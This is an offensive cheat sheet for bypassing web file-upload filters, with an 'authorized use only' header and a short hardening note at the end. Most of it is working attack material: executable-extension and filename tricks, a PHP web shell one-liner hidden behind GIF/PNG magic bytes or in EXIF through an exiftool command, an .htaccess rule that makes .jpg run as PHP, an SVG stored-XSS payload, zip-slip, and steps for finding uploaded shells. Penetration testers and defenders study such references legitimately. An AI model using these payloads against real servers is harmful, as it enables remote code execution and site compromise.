FILE-UPLOAD-BYPASS
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Techniques to get a dangerous file past an upload filter on apps you are authorized to test, aiming for code execution or stored XSS.
EXTENSION FILTER BYPASS#
PHP alt extensions: .php3 .php4 .php5 .php7 .phtml .pht .phar .inc .pgif .phtm ASP/.NET: .asp .aspx .ascx .asa .cer .asmx .config .soap JSP: .jsp .jspx .jsw .jsv .jspf Case tricks: shell.PhP shell.pHtml Double extension: shell.php.jpg shell.jpg.php shell.php. (trailing dot/space on Windows) Null byte (legacy): shell.php%00.jpg Trailing chars: shell.php%20 shell.php%0a shell.php::$DATA (NTFS ADS) Path in filename: ../../shell.php (directory traversal in the name field)
CONTENT-TYPE / MAGIC BYTE BYPASS#
- Change Content-Type header to image/png, image/jpeg, image/gif.
- Prepend real magic bytes so the file "is" an image + PHP after:
GIF8; then <?php system($_GET['c']); ?>
PNG header (\x89PNG\r\n\x1a\n) + payload
- Polyglot: valid JPEG/GIF with PHP in a comment/EXIF so getimagesize() passes:
exiftool -Comment='<?php system($_GET["c"]); ?>' pic.jpg
.HTACCESS / CONFIG UPLOAD#
If you can upload .htaccess, re-map a benign extension to PHP, then upload shell.jpg:
AddType application/x-httpd-php .jpg
# or: php_flag engine on
IIS: upload web.config to enable handler / run ASP in the folder.
IMAGE LIBRARY / SVG / XXE#
- SVG upload -> stored XSS: <svg xmlns="..."><script>alert(document.domain)</script></svg> - SVG -> SSRF/XXE if server renders/parses with a vulnerable XML lib. - ImageTragick (CVE-2016-3714) via crafted MVG/MSL if ImageMagick processes it. - ExifTool RCE (CVE-2021-22204) via crafted metadata on some stacks.
ZIP / ARCHIVE#
- Zip-slip: entries named ../../path to write outside the extract dir. - Symlink in archive -> arbitrary read after extraction.
AFTER UPLOAD#
- Find the stored path (response, predictable dir /uploads/, date-based names). - If randomized name but known dir, brute or trigger an error that leaks it. - Race condition: request the file during the window before AV/rename runs.
HARDENING (blue-team note)#
Validate by content not extension, store outside webroot, randomize names, serve with Content-Disposition: attachment, disable script execution in the upload dir, and re-encode images server-side.